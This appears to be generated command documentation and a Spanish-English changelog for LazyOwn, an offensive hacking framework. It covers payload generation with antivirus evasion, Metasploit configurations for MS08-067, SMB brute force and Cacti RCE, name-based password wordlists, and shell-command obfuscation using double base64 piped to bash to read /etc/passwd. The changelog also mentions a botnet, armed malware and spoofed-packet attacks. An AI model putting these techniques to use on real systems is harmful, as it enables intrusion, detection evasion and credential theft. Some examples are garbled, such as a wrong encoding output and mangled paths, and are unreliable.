:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution: To manually generate a payload using MSFPC, use the following command: msfpc

Replace the placeholders with the desired values. For example: msfpc windows 4444 reverse stageless tcp verbose

Example usage: msfpc windows # Windows & manual IP. msfpc elf bind eth0 4444 # Linux, eth0’s IP & manual port. msfpc stageless cmd py https # Python, stageless command prompt. msfpc verbose loop eth1 # A payload for every type, using eth1’s IP. msfpc msf batch wan # All possible Meterpreter payloads, using WAN IP.


Generates payloads using Ivy with various options. Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.

This function checks if Ivy is installed and installs it if necessary. It then runs Ivy with the specified parameters to create various payloads.

:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution: To manually generate a payload using Ivy, use the following command: ./Ivy

Replace the placeholders with the desired values. For example: ./Ivy -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js ./Ivy -stageless -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -process64 C:.exe -process32 C:.exe -O stageless.js

Example usage: ivy staged_inject -Ix64 test64.vba -Ix86 test32.vba -P Inject -O SampleInject.js ivy stageless_local -Ix64 stageless64.bin -Ix86 stageless32.bin -P Local -O stageless.js ivy one_liner -Ix64 stageless64.bin -Ix86 stageless32.bin -P Inject -O test.png -stageless


Execute the tor.sh script with the specified port or default to port 80 if no port is provided.

This function constructs a command to run the tor.sh script with superuser privileges, it defaults to port 80. The command is then printed and executed.

Parameters: line (str): Defaults to “80”

Returns: None

Example: >>> do_tord(self, ““) sudo bash sessions/tor.sh

do_tord(self, ““) sudo bash sessions/tor.sh

Note: Ensure that the tor.sh script exists in the sessions directory and that you have the necessary permissions to execute scripts with sudo.


Generates a wordlist based on a target name and a list of characters, with various combinations.

This function prompts the user for a target name and a wordlist name, then generates various combinations of the target name with a given list of characters. The combinations include single, double, triple, fourth, fifth, sixth, and intercalated character variations. The generated passwords are saved to the specified wordlist file.

:param line: Not used in this function.

:returns: None

Manual execution: To manually generate a wordlist, run the script and follow the prompts to enter the target name, wordlist name, and additional characters if desired.

For example: Enter target name(Ex. john) ::: john Enter wordlist name ::: my_wordlist.txt Char List ::: 1 2 3 4 5 6 7 8 9 0 ! @ # $ Do you want to add more characters in char List[y/n] ::: y Enter characters by commas(Ex. : ^,&,,) ::: ^,&,


Traces the DNS information for a given domain using the FreeDNS service. (using freedns IP Not your IP)

This method performs a DNS trace lookup for the specified domain by sending an HTTP GET request to the FreeDNS service. If no domain is provided in the input parameter line, it defaults to using the URL specified in the instance’s parameters.

Parameters: line (str): The domain name to trace. If not provided, the method uses the domain extracted from self.params["url"].

Returns: None: This method executes a system command and does not return a value.

Example: >>> self.do_trace(“example.com”) Executes a DNS trace for “example.com”.

Notes: - Ensure that the self.params["url"] is set with a valid URL if no domain is provided. - The method uses os.system to execute the trace command, which may not be the most secure or efficient method for production code. Consider using a library like requests for HTTP operations if security and efficiency are concerns.


Generates payloads using Veil-Evasion with various options. Veil-Evasion is a payload creation framework for generating payloads that evade antivirus detection. This function checks if Veil-Evasion is installed and installs it if necessary. It then runs Veil-Evasion with the specified parameters to create various payloads.

:param line: Not used in this implementation but reserved for future use.

:returns: None

Manual execution: To manually generate a payload using Veil-Evasion, use the following command: ./Veil-Evasion.py -p

Replace the placeholders with the desired values. For example: ./Veil-Evasion.py -p python/meterpreter/rev_https LHOST= LPORT=443

Example usage: veil python_meterpreter_rev_https LHOST= LPORT=443 veil ruby_meterpreter_rev_tcp LHOST= LPORT=4444


Finds and returns a list of target hosts with port 445 open in the specified subnet.

Args: subnet (str): The subnet to scan, e.g., ‘’.

Returns: list: A list of IP addresses where port 445 is open.


Sets up a Metasploit multi/handler configuration in the given config file.

Args: config_file (file-like object): The file object to write the Metasploit handler configuration to. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Exploit configuration for Metasploit to the provided file.


Configures and writes a Metasploit exploit for the Conficker vulnerability to the given config file.

Args: config_file (file-like object): The file object to write the Metasploit exploit configuration to. host (str): The target host IP address to exploit. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Exploit configuration for the Conficker vulnerability (MS08-067) to the provided file.


Configures and writes a Metasploit SMB brute force exploit for the given host to the provided config file.

Args: config_file (file-like object): The file object to write the Metasploit exploit configuration to. host (str): The target host IP address to exploit. passwd_file (str): Path to a file containing a list of passwords to use for brute force. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Exploit configuration for SMB brute force (using the psexec module) to the provided file for each password in the passwd_file.


Sets up a Metasploit multi/handler exploit configuration in the provided config file.

Args: config_file (file-like object): The file object to write the Metasploit handler configuration to. lhost (str): The local host IP address to listen for incoming connections. lport (int): The local port number to listen for incoming connections.

Writes: - Configuration commands to the file to set up the Metasploit handler with the specified payload and options. - The payload used is php/meterpreter/reverse_tcp. - The handler is configured to listen on the provided LHOST and LPORT. - Starts the exploit with the -j -z options.


Configures an exploit for the Cacti Package Import Remote Code Execution vulnerability in the provided config file.

Args: config_file (file-like object): The file object to write the Metasploit exploit configuration to. host (str): The target host IP address where the Cacti service is running.

Writes: - Configuration commands to the file to set up the Metasploit exploit for the Cacti Package Import RCE. - Sets the RHOST to the target host IP. - Sets the payload options including the LHOST, USERNAME, and PASSWORD. - Starts the exploit with the -j -z options.


Generates single character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Generates double character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Generates triple character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Generates fourth character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Generates fifth character combinations with the target name.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Generates sixth character combinations with the target name, adding uppercase characters.

:param name: Target name to use in the combinations. :param characters: List of characters to combine with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Generates combinations of the target name and character list, intercalating uppercase and lowercase characters.

This function generates combinations where each character in the string alternates between uppercase and lowercase. It also allows for the addition of the target name at the beginning or the end of the string.

:param name: Target name to use in the combinations. :param characters: List of characters to intercalate with the target name. :param file: File object to write the combinations to. :param total: Running total of passwords generated. :param flag: If True, generate combinations with the target name at both the beginning and the end of the string.

:returns: Updated total of passwords generated.


Expands a regular expression into a list of characters.

:param regex: Regular expression string to expand. :returns: List of characters matching the regular expression.


Perform double Base64 encoding on the given command.

This helper function takes a command string, encodes it in Base64, and then performs another Base64 encoding on the result. The final encoded string is returned.

Args: cmd (str): The command string to be encoded.

Returns: str: The double Base64 encoded string.

Example: >>> double_base64_encode(“example”) ‘ZWN4YW5hbWVsZQ==’

Notes: - The function first encodes the command string into bytes using UTF-8 encoding. - It then applies Base64 encoding twice and removes any leading or trailing whitespace. - The result is decoded back to a string and returned.

Raises: TypeError: If the input cmd is not a string.


Generate a list of obfuscated commands based on the given input command.

This function creates various obfuscated versions of the provided command string. Each obfuscation method applies a different technique to disguise the command, making it less recognizable to simple static analysis.

Args: cmd (str): The command string to be obfuscated.

Returns: list of str: A list of obfuscated command strings.

Example: >>> apply_obfuscations(“cat /etc/passwd”) [ ‘echo “echo $(echo 'cat /etc/passwd' | base64 | base64)|base64 -d|base64 -d|bash" | sed 's/ /${IFS}/g’‘, ’echo {double_base64_encode(cmd)}|base64 -d|base64 -d|bash’, ‘$(tr’[A-Z]’ ‘[a-z]’ <<< ‘cat /etc/passwd’)’, … ]

Notes: - Each obfuscation method aims to transform the command in a unique way. - Obfuscations include encoding, character replacement, and command substitution techniques. - Ensure that the double_base64_encode function is defined and available in the scope where this function is used.

Raises: TypeError: If the input cmd is not a string.


Helper function to alternate the case of characters in a string.




    • feature(feat): now tord, trace, and generatedic to generate dictionary with params Version: release/0.1.39 :D Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown - payload.json - sessions/download_resources.sh - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Sep 7 01:41:09 2024 -0400 Hora: 1725687669



    • test(test): testing new feature tord Version: release/0.1.38 documented at COMMANDS.md Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - sessions/tor.shLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Sep 6 03:29:03 2024 -0400 Hora: 1725607743



    • test(test): ivy shellcodes test Version: release/0.1.38 new command documented at commands.md Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Sep 6 02:56:06 2024 -0400 Hora: 1725605766



    • docs(docs): new alias Version: release/0.1.38 new alias tor documented Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown - sessions/tor.shLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Sep 5 01:49:22 2024 -0400 Hora: 1725515362



    • docs(docs): corrections in text Version: release/0.1.38 and some capitals Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Sep 5 01:42:38 2024 -0400 Hora: 1725514958



    • docs(docs): new links Version: release/0.1.38 automatic download link generated by the app Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Sep 5 01:22:00 2024 -0400 Hora: 1725513720



    • docs(docs): better docs Version: release/0.1.38 is zen now :) Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Sep 4 02:31:58 2024 -0400 Hora: 1725431518

Nuevas características


    • feat(fet): msfpc Version: release/0.1.38 automation Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Tue Sep 3 01:15:14 2024 -0400 Hora: 1725340514



    • feature(feat): comandos nuevos documentados en commands.md Version: release/0.1.37 davtest y backdoor_factory Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Mon Sep 2 23:34:25 2024 -0400 Hora: 1725334465



    • feature(feat): new command apache_users & new options -p to use diferents payloads.json Version: release/0.1.36 now more oriented to redteams you can run multiple instances with multiple payloads Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - main.py - sessions/users.txt - sessions/win/winp.ps1 - templates/index.html - utils.pyfile(s):- main.py - templates/index.htmlLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 1 05:45:31 2024 -0400 Hora: 1725183931



    • docs(docs): documented malwarebazar Version: release/0.1.35 Fetches and displays malware information from the MalwareBazaar API based on the given tag. Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - sessions/download_resources.shLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 1 00:21:33 2024 -0400 Hora: 1725164493



    • docs(docs): documentating Version: release/0.1.35 functions dacledit and bloodyAD Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Sep 1 00:13:39 2024 -0400 Hora: 1725164019



    • feature(feat): Nuevos comandos documentados en COMMANDS.md Version: release/0.1.35 kerbrute, dacledit, bloodyAD, evilwinrm, getTGT Modified file(s):- .gitignore - COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown - payload.json - sessions/php/LFI/scan-LFI.php - sessions/php/LFI/uploadshellLFI.php - sessions/php/ar-protable/arabportable.php - sessions/php/jo/bru-jo.php - sessions/php/jo/pass.txt - sessions/php/jo/site.txt - sessions/php/shell/c2.sh - sessions/php/shell/shell.php - sessions/php/user/user.php - sessions/php/wp/wp.php - sessions/users.txtLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 31 06:21:44 2024 -0400 Hora: 1725099704



    • feature(feat): nuevos comandos documetados en COMMANDS.md Version: release/0.1.34 changeme, enum4linux_ng, fuzz, sharpshooter, sliver_server, gencert Modified file(s):- COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - lazyown - sessions/download_resources.sh - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 30 23:33:30 2024 -0400 Hora: 1725075210



    • feature(feat): nuevos comandos documentados en COMMANDS.md Version: release/0.1.33 sherlock, trufflehog, weevelygen, weevely Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 30 03:07:45 2024 -0400 Hora: 1725001665

Correcciones urgentes


    • hotfix(hotfix): deleted the insecure chat Version: release/0.1.32 DELETED Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 30 02:58:04 2024 -0400 Hora: 1725001084



    • feature(feat): Nuevos comandos documentados en COMMANDS.md Version: release/0.1.31 parsero, nueclei, dmitry, msfrpc, graudit, cewl, sslscan Modified file(s):- COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown - sessions/download_resources.sh - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 28 23:02:18 2024 -0400 Hora: 1724900538



    • feature(feat): Nuevos comandos documentados en COMMANDS.md Version: release/0.1.30 sqli, sshkey, crunch, malwarebazar, download_malwarebazar, and an easteregg :) Modified file(s):- COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - lazyown - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 27 02:47:43 2024 -0400 Hora: 1724741263



    • fix(fix): some fixes in c2 Version: release/0.1.29 now curl attack Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 27 01:53:40 2024 -0400 Hora: 1724738020

Nuevas características


    • feat(kick): to kick from net some ip Version: release/0.1.28 seend spoofed packet to kick some ip from our net Modified file(s):- COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - lazyown - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 27 00:53:52 2024 -0400 Hora: 1724734432



    • feature(new command c2 documentad at COMMANDS.md): a little botnet over http :) Version: release/0.1.27 this is my second aproach the first is a little botnet using sockets, the new it’s web :) Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Mon Aug 26 03:07:21 2024 -0400 Hora: 1724656041



    • fix(fix auto exploit cacti rce logged): now the attack work automated Version: release/0.1.26 smoothy Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Mon Aug 26 02:18:44 2024 -0400 Hora: 1724653124



    • feature(new commands docummented at COMMANDS.md): waybackmachine, morse, powerserver, shellshock, wifipass, ngrok and smalldic Version: release/0.1.25 with love by grisun0 Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - modules/headers.json - modules/lazyseo.py - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 23:28:31 2024 -0400 Hora: 1724556511



    • feature(2 new attacks): docummented at COMMANDS.md Version: release/0.1.24 smbattack and cacti_exploit Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 15:22:18 2024 -0400 Hora: 1724527338



    • test(new machine): monitorsthree.htb Version: release/0.1.23 happyhacking Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - payload.jsonLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 03:15:09 2024 -0400 Hora: 1724483709



    • refactor(new payload): in msfvenom Version: release/0.1.23 :) java jsp :) Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 01:45:02 2024 -0400 Hora: 1724478302

Nuevas características


    • feat(new feature): padbuster Version: release/0.1.23 new command padbuster documented at COMMANDS.md Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 00:11:22 2024 -0400 Hora: 1724472682



    • docs(documentacion): nueva versiòn en la web reflejada en el banner Version: release/0.1.22 :) Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bakLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 24 00:03:47 2024 -0400 Hora: 1724472227



    • docs(new documentation): better documentation to commands and utils Version: release/0.1.22 :) Modified file(s):- COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - lazyown - utils.pyLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 23 23:30:32 2024 -0400 Hora: 1724470232

Nuevas características


    • feat(new feat in createdll): new option 3 to run automate create dll blazor malware Version: release/0.1.22 this attack its in 2 faces, first run lazymsfvenom or venom, crate shell.elf and you can cratedll option 3 :) Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - sessions/lin/blazormalware.shLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 23 23:13:14 2024 -0400 Hora: 1724469194



    • fix(fix): blazormalware corrected now functional and armed :) Version: release/0.1.21 and lanter machine was pwned :P Modified file(s):- README.md - docs/README.html - docs/index.html - docs/index.html.bak - sessions/lin/blazormalware.sh - sessions/win/lazycat.ps1 - sessions/win/rev.cLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 23 15:28:03 2024 -0400 Hora: 1724441283



    • docs(Lang): Translate README.md to English, enhancing clarity and structure for better understanding of the project features and usage. Version: release/0.1.20 This commit translates the README.md file into English to make it accessible to a wider audience. The translation maintains the original content’s intent while improving clarity and coherence. Additionally, I’ve structured the document to highlight key features, usage instructions, acknowledgments, and licensing information. This update aims to enhance the overall understanding of the LazyOwn project and its functionalities. Modified file(s):- COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyownLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 21 02:25:41 2024 -0400 Hora: 1724221541

Nuevas características


    • feat(malware new): blazor malware Version: release/0.1.20 create blazormalware.sh Modified file(s):- DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - sessions/download_resources.shLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 20 03:17:47 2024 -0400 Hora: 1724138267



    • refactor(refactor): se agrega la libreria colors en modules para usar colorines en los modulos Version: release/0.1.19 se agrega un script que hace seo a rhost, ademas de un poco de scraping para darnos datos sobre el host Modified file(s): - COMMANDS.md - DEPLOY.sh - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - modules/lazyproxy.pyDeleted file(s): Created file(s): LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Tue Aug 20 02:20:17 2024 -0400 Hora: 1724134817



    • feature(feat): dos comandos nuevos, skipfish y createdll, nuevo shellcode Version: release/0.1.19 nuevos recursos Modified file(s): - .gitignore - COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - payload.json LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Mon Aug 19 02:20:52 2024 -0400 Hora: 1724048452

Nuevas características


    • feat(feat): create new command shellcode, run lazymsfvenom modified to create shellcode.sh Version: release/0.1.18 modify find command to add the one linner to more pleassure Modified file(s): - COMMANDS.md - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - utils.py LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Mon Aug 19 00:35:53 2024 -0400 Hora: 1724042153

Nuevas características


    • feat(new feat): new funcionality in proxy command, hexdump on screen, capacity to edit responces from client and server :) mitm ? xD now only prints the thata before sent Version: release/0.1.17 and alien gray at the banner :P - README.md - docs/README.html - docs/index.html - docs/index.html.bak - modules/lazyproxy.py LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Aug 18 21:12:26 2024 -0400 Hora: 1724029946

Nuevas características


    • feat(feat): new prompt Version: release/0.1.16 now show the url of the target - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Aug 18 18:46:18 2024 -0400 Hora: 1724021178

Nuevas características


    • feat(feat): new command set_proxychains Version: release/0.1.15 documented at COMMANDS.md more info use help set_proxychains - COMMANDS.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Aug 18 16:41:31 2024 -0400 Hora: 1724013691



    • fix(bug fixing): bug fixing in vars of DEPLOY.sh Version: release/0.1.14 was created readme_file_html to avoid the bug - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sun Aug 18 16:37:23 2024 -0400 Hora: 1724013443



    • feature(new payload in msfvenom android): new options in msf rev android Version: release/0.1.13 bug fixing in DEPLOY.sh duplicated function - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 17 06:44:52 2024 -0400 Hora: 1723891492



    • docs(documented): agradecimientos Version: release/0.1.12 a ✌ el creador de sicat - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 17 06:39:12 2024 -0400 Hora: 1723891152

Nuevas características


    • feat(implement sicat libs): to ss command Version: release/0.1.12 agradecimientos al creador de sicat tremanda t00l todo el credito a sus autores https://github.com/justakazh/sicat/ - COMMANDS.md - README.md - UTILS.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - lazyown - payload.json - utils.py LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Sat Aug 17 02:40:13 2024 -0400 Hora: 1723876813

Nuevas características


    • feat(some fixes): html and new patreon :) Version: release/0.1.11 :) - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 16 21:52:15 2024 -0400 Hora: 1723859535



    • feature(new tools): new commands, new payloads in find, new cves, new machine Version: release/0.1.10 from ping to r00t https://www.youtube.com/watch?v=v3XCNM9n534 - COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown - payload.json - sessions/download_resources.sh LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 16 16:56:04 2024 -0400 Hora: 1723841764

Nuevas características


    • feat(new feature): new command finalrecon docuemnted at COMMANDS.md Version: release/0.1.9 new tool file to pwntomate to perform aun automated scann - COMMANDS.md - README.md - docs/COMMANDS.html - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 16 02:57:52 2024 -0400 Hora: 1723791472

Nuevas características


    • feat(command): new commando swaks to abuse of smtp Version: release/0.1.8 helper to perfom abuse to smtp server - COMMANDS.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Fri Aug 16 02:35:16 2024 -0400 Hora: 1723790116



    • fix(fix in vpn): new machine Version: release/0.1.7 chenges in payload.json - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown - payload.json LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 23:58:16 2024 -0400 Hora: 1723780696



